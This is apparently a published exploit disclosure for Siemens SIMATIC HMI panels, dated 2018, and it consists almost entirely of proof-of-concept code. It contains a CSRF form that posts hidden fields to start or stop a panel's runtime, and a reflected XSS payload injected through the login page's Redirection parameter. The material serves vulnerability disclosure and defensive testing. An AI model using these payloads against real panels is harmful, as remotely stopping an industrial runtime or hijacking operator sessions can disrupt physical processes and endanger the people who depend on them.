Siemens SIMATIC Panels Cross Site Request Forgery / Cross Site Scripting

`# Exploit Title: Siemens SIMATIC Panels Multiple Vulnerability  
# Date: 18.05.2018  
# Exploit Author: t4rkd3vilz  
# Vendor Homepage: http://www.siemens.com/  
# Version: Multiple SIMATIC Panels (TP, OP, MP, Mobile, Comfort)  
# Greetz: Jameel Nabbo  
  
CSRF PoC  
  
<FORM METHOD="POST" ACTION="http://TargetIP/wwwSiemens  
<http://targetip/wwwSiemens>">  
<TD>  
<INPUT TYPE="submit" VALUE="Start runtime" class="ad_button">  
</TD>  
<TD>  
<INPUT TYPE="hidden" NAME="StartRt">  
  
</TD>  
</FORM>  
</tr>  
<tr>  
<FORM METHOD="POST" ACTION="/wwwSiemens">  
<TD>  
<INPUT TYPE="submit" VALUE="Stop runtime" class="ad_button">  
</TD>  
<TD>  
<INPUT TYPE="hidden" NAME="StopRt">   
</TD>  
</FORM>  
  
  
And XSS PoC  
  
http://TargetIP/Templates/Loginpage.html?Realm=FileBrowserUser&Redirection=  
<http://targetip/Templates/Loginpage.html?Realm=FileBrowserUser&Redirection=>"/><svg/onload=prompt(/XSS/)>  
`